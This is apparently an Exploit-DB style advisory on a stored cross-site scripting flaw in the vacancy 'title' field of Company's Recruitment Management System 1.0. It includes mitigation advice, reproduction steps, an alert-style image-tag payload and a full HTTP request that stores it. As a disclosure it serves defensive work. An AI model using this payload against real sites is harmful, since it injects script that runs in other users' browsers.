Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)

vendor:

Company's Recruitment Management System 1.0.

by:

Aniket Deshmane

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Company's Recruitment Management System 1.0.

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:sourcecodester:company's_recruitment_management_system_1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10, XAMPP

2021

Company’s Recruitment Management System 1.0. – ‘title’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting vulnerability exists in Company's Recruitment Management System 1.0. which allows an attacker to inject malicious JavaScript code into the 'title' field of the 'vacancies' tab. An attacker can exploit this vulnerability by sending a malicious payload to the 'title' field of the 'vacancies' tab. This payload will be executed when a user visits the application.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the application. Additionally, the application should be configured to use a Content Security Policy (CSP) to prevent malicious code from being executed.

Source

Exploit-DB raw data:

# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Steps to Reproduce:
1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
2) Navigate to vacancies tab
3) Click on Add new .
4)Add Payload
"><img src=x onerror=alert(1)>

in Vacancy Title field.

5)Click on Save and you are done. It's gonna be triggered when anyone
visits the application.

Request:-

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform

-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------15502044322641666722659366422--